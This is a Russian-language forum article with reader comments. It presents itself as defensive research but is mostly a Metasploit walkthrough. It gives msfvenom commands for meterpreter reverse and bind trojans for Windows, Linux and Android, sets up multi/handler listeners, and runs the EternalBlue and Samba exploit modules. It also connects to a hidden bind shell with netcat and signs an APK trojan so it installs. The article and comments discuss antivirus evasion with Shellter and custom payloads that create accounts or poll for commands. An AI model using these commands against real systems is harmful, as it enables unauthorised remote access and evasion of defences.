Статья Исследование и анализ самых популярных эксплоитов и как защититься от них

Приветствую всех читателей форума! Сегодня я таки решился написать это, вопреки всем своим сомнениям и лени. А речь мы заведем о самых часто используемых эксплоитax для получения удаленного доступа. Каждый из них будет поочередно проанализирован и разобран для того, чтобы понять, как же защититься от этого.

После прочтения этих предложений ты, возможно понял, о чём будет идти речь в этой статье. Исходя из этого предоставляю список, через который каждый из эксплоитов пройдёт. Обзовем это этапами анализа. Встречайте!
  1. История происхождения и его разработка
  2. Где вы могли его видеть и где он был замешан?
  3. Подверженные атаке системы
  4. Краткий гайд по использованию
  5. Что препятствовало получению доступа?
  6. Отчёт с VirusTotal
  7. Как же такому противостоять?
  8. Недостатки
  9. Выводы
По традиции, в мои обязанности входит вставить сюда авторский дисклеймер, который по общепринятым суждениям должен избавить автора от ответственности, но мы прекрасно пониманием, что даже если представленная информация будет использована с зловредными целями и кто-то пострадает, то вина исключительно на ваших плечах, а точнее на ключице злоумышленника. Ну и на моих, конечно.

Никакой дисклеймер и тому подобная чушь не избавит меня от мук совести, ведь какие-то моральные качества сохранить удалось. Статья написана мной из хороших побуждений. Это не инструкция, как хакнуть ПК друзей, не-е-е-т! Это сделано, чтобы от подобных действий каждый из читающих мог противостоять и защитить себя, свои персональные данные от действий неблагонадёжного контингента.

Первым подопытным станет широкоизвестный эксплоит под названием MultiHandler, который будет представлен с различными Payloadами. Достаточно хороший способ получить сессию на удалённом ПК, но всё же не идеально. Дальше поймёте почему.

Оборудование представленное в тексте:
  1. Ноутбук с операционной системой Windows 7
  2. Виртуальная машина с OS Windows server
  3. вторая виртуальная машина с OS Win XP SP2
  4. стационарный ПК с установленным Kali Linux
  5. Мобильный телефон с эмулятором терминала
  6. Виртуальная машина с OS Linux mint 13
MultiHandler или неплохие Meterpreter трояны

1) О создании этого чудесного эксплоита, как на просторах русскоязычного гугла, так и на англоговорящих нет ни слова, но вряд-ли подобного рода listener создавался долгое время, скорее всего он является плодом обоюдной любви Rapid7 и его соратников, во время пересборки метасплоита. Впрочем, не суть.

2) В каких атаках был замешан этот совершенейший листенер? Как по мне, это не стоит того, чтобы углубляться в это, ведь каждая пятая удалённая сессия, успешно полученная злоумышленником, эксплуатируется с помощью этого чуда.

3) Практически все, от самых старых до Windows 10 последнего обновления без FireWalla, специально для написания этой статьи были проведены соответствующее исследования и тесты в этой области .

4) Подойдя вплотную к мануалу по использованию этого утопия, мы стыкаемся со следующим: на нем огромное количество полезных нагрузок, которые могут генерироваться и автономно доставляться на атакуемую тачку. Я продемонстрирую только три основных. К сожалению в этот список не войдёт http-payload на порт 443, только из-за острой нехватки времени.
  • MultiHandler, msfvenom и bind_TSP или получения meterpreter сессии, когда вам уже известен IP жертвы
Для начала нам нужно создать полезную нагрузку ,которая будет доставлена самой жертве, это делается посредством социальной инженерии и подобных приёмов. LHOST - IP-адрес вашего ПК.
  • LPORT - Порт, через который будет работать "слушатель"
  • -p - Payload или полезная нагрузка
  • -f - cоставная задающая тип файла,забегу наперед ,но возможно указать даже APK
Код:
msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/TCP_bind.exe
28966


Предельно просто, задаём пейлоад, тип файла и место сохранения,после того как мы перейдём в каталог root, мы увидим наш готовый файл. А продемонстрирую это всё дело с мобильного устройства с эмулятором. Для чего? Не знаю и сам, может ради того, чтобы продемонстрировать, что я могу получить доступ к ПК с телефона.

Запустим метасплоит и выполним следующее команды:
Код:
msfconsole
use exploit/multi/handler
28967


Установим интересующий нам пейлоад, естественно тот, который соответствует нашему .exe:
Код:
set payload windows/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.43.211
run
Установив порт и айпи жертвы, без зазрения совести запускаем слушатель, после чего открываем файл на атакуемом ПК и видим, что открылась сессия метерпретер. Всё работает по следующему принципу: пейлоад.exe в данной ситуации выступает в роли клиента к которому мы проводим подключения с помощью нашего слушателя. Предельно простая схема.

28968


5) Какие же антивирусы препятствовали нам? Да практически все! Для начала все с них палили наш пейлоад, как троян, а для концовки - они не давали нам подключиться к жертве через листенер. Если не забуду, то скину ссылку или скрин с VT.

28969


6) Защиту можно построить на базовых двух вещах: антивирусе и браундмаэре и на собственной голове. Но дальше я расскажу, как можно замаскировать это дело от антивирусов, тогда этот неподъёмный груз ложится только на вашу голову.

7) Выводы? Какие могут быть выводы если мы только на первом из трёх пейлоадов для слушателя? MultiHandler и Reverse_TCP. Выше я расписал о этом эксплоите, давайте к мануалу сразу! Как и в прошлый раз создаём пейлоад.ехе, но с некоторыми поправками.
Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=5555 -f exe > / root/reverse_tcp.exe
28970


Затем это всё добро доставляем жертве, после чего осталось только настроить слушатель. Это делается так же, но с небольшими правками.
Код:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP 192.168.43.1
set lport 5555
exploit
28971


После того, как жертва запустит наш пейлоад, мы словим сессию метерпретер. Суть заключается в том, что не мы подключаемся к нему, а он к нам, от сюда и название "Обратный".

Ну и скрытый шелл с помощью Netcat. Создаём исправленный пейлоад.exe:
Код:
msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.43.1 lport=1010 -f exe > /root/hidden.exe
28972


После доставке жертве, злоумышленник обычно занят настройкой слушателя, как и мы всегда, но здесь мы и без него обойдёмся. Выручит нас netcat. Пишем:
Код:
nc 192.168.43.211 1010
28973


После ловим сессию.

Выводы о MultiHandler: вещь неплохая, но не очень практичная, поскольку палится всем, чем только можно, при этом поддаётся криптованию, о чём расскажу ниже. Обычный антивирус и голова на плечах - в силах противостоять этому.

EnternalBlue или появления Petya и WannaCry

1) Об истории этого легендарного эксплоита можно говорить сутками напролёт, но всё-же ограничимся краткой историей. Википедия гласит: EternalBlue (CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года, а также при распространении Petya в июне 2017 года.

2) Был замешан в множестве атак, но самыми известными считают распространение WannaCry и Petya.

3) Windows 7, Windows server/R2 без патча CVE-2017 и при отсутствии антивируса, который будет срывать сессию.

4) Мануал, о да. О этом куча информации, поэтому не буду даже объяснять команды!
Код:
use exploit/windows/smb/ms17_010
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.43.1
set rhost 192.168.43.211
28974


В итоге получил ошибку, видимо у меня уже установлен на это патч или закрыт смб порт.

5) Антивирусы, определённо, срывают коннект.

6) Регулярные обновления и наличия закрытых портов с антивирусом - вас защитит.

Samba Exploit и Reverse для Linux

Решил слить два метода в один, ведь они касаются одной операционной системы и как использовать листенер - показано выше.

1) Оба эксплоита не имеют особой истории, оба достаточно древние, но в случае с пейлоад.ехе - непобедимый вариант.

2) Ко мне особые слухи об этих чудищах не успели дойти, но, думаю, в паре атак их использовали.

3) Получения удалённого доступа к тачке под линукс - их прямая и непосредственная задача.

4) Начнём с пейлоад.ехе, не буду показывать часть с настройкой слушателя, а просто создадим наш файлик.
Код:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -f elf > /root/shell
Дальше идёт настройка слушателя и ловля с подсакой сессии, ну а мы переходим к самбе! Да, давайте забьём на всё и потанцуем самбу! Итак, протанцевав пол дня, я наконец осознал, что я должен написать о этом ужасном эксплоите со столь умилительным названием. Без лишних разъяснений приступаем.
Код:
use exploit/linux/samba/lsa_transnames_heap
set payload linux/x86/shell_bind_tcp
set rhost 175.167.45.234
set rport 445
exploit
После ловим сессию.

5) Исходя из того, что это... Линукс, пейлоад.ехе вирус тотал одобрил полностью, не обнаружив ни-че-го. Но подвержены эксплуатации более раннее версии, где не устранена уязвимость с самбой.

6) Единственной защитой, кроме головы, является установка более новых версий линукс.

Троян на андроид, любой версии или msfvenom-trojan в деле

Я понимаю, что подобного рода статья относится к тому, что было в начале статьи, но здесь есть свои подводные камни, которые мне удалось найти.

1) Насчёт создания и всего прочего - не известно, точнее в рунете нет ничего толкового.

2) Не фигурировал в каких-то крупных атаках.

3) Создаём всё такой же пейлоад, но с расширениям apk, ведь атакуемая тачка - андроид!
Код:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.43.211 lport=8888 > /root/file.apk
.
28978


По традиции доставляем его на телефон жертвы и настраиваем слушатель:
Код:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.211
set lport 8888
exploit
После устанавливаем APK-шку на андроид, но видим следующее: "Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия метерпретер.

4) Самое забавное в этом всём, что подобное проникновение невозможно обнаружить антивирусом. Он абсолютно не имеет шансов против него. Суждение большей части людей: "Вирусы на андроид? Чё? Еретик!", - и тебя мгновенно жгут на костре фанаты андроида. Лучшая защита - ваша голова и осведомлённый мозг.

Shellter! Криптор пейлоадов!
Да! Господа, поскольку большая часть антивирусов палит пейлоады, нужно закриптовать это всё дело, что затруднит обнаружение вирусных сигнатур. Давайте-ка закриптуем одно из наших чудес метасплоита? Нет... Это уж в продолжении этой статейки, которую смело можно номинировать на звание исследования. Только два антивируса из пятидесяти обнаружили криптованный файл-троян.

Для чего я низверг столько информации? Не нужно забывать, что лучшим антивирусом является светлая и осведомленная голова. Всё это написано для получения элементарных знаний, как работает это всё и как этому противостоять. В следующей части мы разберем как закриптовать и как обнаружить троян-пейлоад, как провести атаку через текстовые файлы или 7 чудес Metasploit ждут вас. До скорого, ребята.
 
Отличная статья, а в плане реализации атак по внешнему IP адресу, есть какие-то нюансы?
 
Отличная статья, а в плане реализации атак по внешнему IP адресу, есть какие-то нюансы?
нужно пробрасывать порты ,я в следующей части о этом повествую и это только для Самбы и Блю , остальные работают не в зависимости от типа адреса ..

Добротная информация , только в начале статьи исправьте опечатку > bind_TCP
Обязательно, спасибо за замечания.
 
Есть ли возможность самоактивации сессии, что если жертва не нажмёт на иконку?
 
интересно посмотреть на работу шеллтера. у меня в любом случае staged метерпретера палится проактивкой, пока не могу это обойти... мож кто подскажет? )
 
интересно посмотреть на работу шеллтера. у меня в любом случае staged метерпретера палится проактивкой, пока не могу это обойти... мож кто подскажет? )
Пока что не углублялся дальше в эту тему по состоянию своего же здоровья,в скором времени выпущу статью,где затрону и эту тему. Спасибо за комментарий.
 
буду благодарен!
вообще дефендер, а теперь, как убедился, и малварь обойти достаточно просто, никаких проблем с этим нет. но вот само тело метерпретера как-то детектирует. пока в ступоре нахожусь
 
!!!FACEPALM!!! ЭТО НЕ СПЛОИТЫ - ЭТО ПЭЙЛОАДЫ. Причем увы и ах, тупой msfvenom даже обшитый шикатой и <censured> тьмой криптографии родного метасплоита спалит даже мой попугай. Реалии 2019 года. Даже всеми любимый когда то Veil гавно. Вариант только один писать самому shellcod'ы.
 
  • Нравится
Реакции: rocoss75 и CHEATER
!!!FACEPALM!!! ЭТО НЕ СПЛОИТЫ - ЭТО ПЭЙЛОАДЫ. Причем увы и ах, тупой msfvenom даже обшитый шикатой и <censured> тьмой криптографии родного метасплоита спалит даже мой попугай. Реалии 2019 года. Даже всеми любимый когда то Veil гавно. Вариант только один писать самому shellcod'ы.
так и предполагал... буду благодарен, если подскажете с чего начать )
 
так и предполагал... буду благодарен, если подскажете с чего начать )
Hacking Art Of Exploatation - Библия хакеров
Shellcode Handbook - Про шеллкоды, хватит чтобы понять как это и с чем едят.
Что касается эвристики антивирусов. Рекомендую не юзать метерпретер, а использовать собственный payload, а там уже полет фантазии, например в пэйлоаде включаешь RDP и создаешь учетку. (нужен локальный админ) или пусть стучится на сайт и заберает команду. Вообщем думай сам. Dll Inject'ы и инъекции в процессы может работать но не с метерпретеровской stages нагрузкой.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!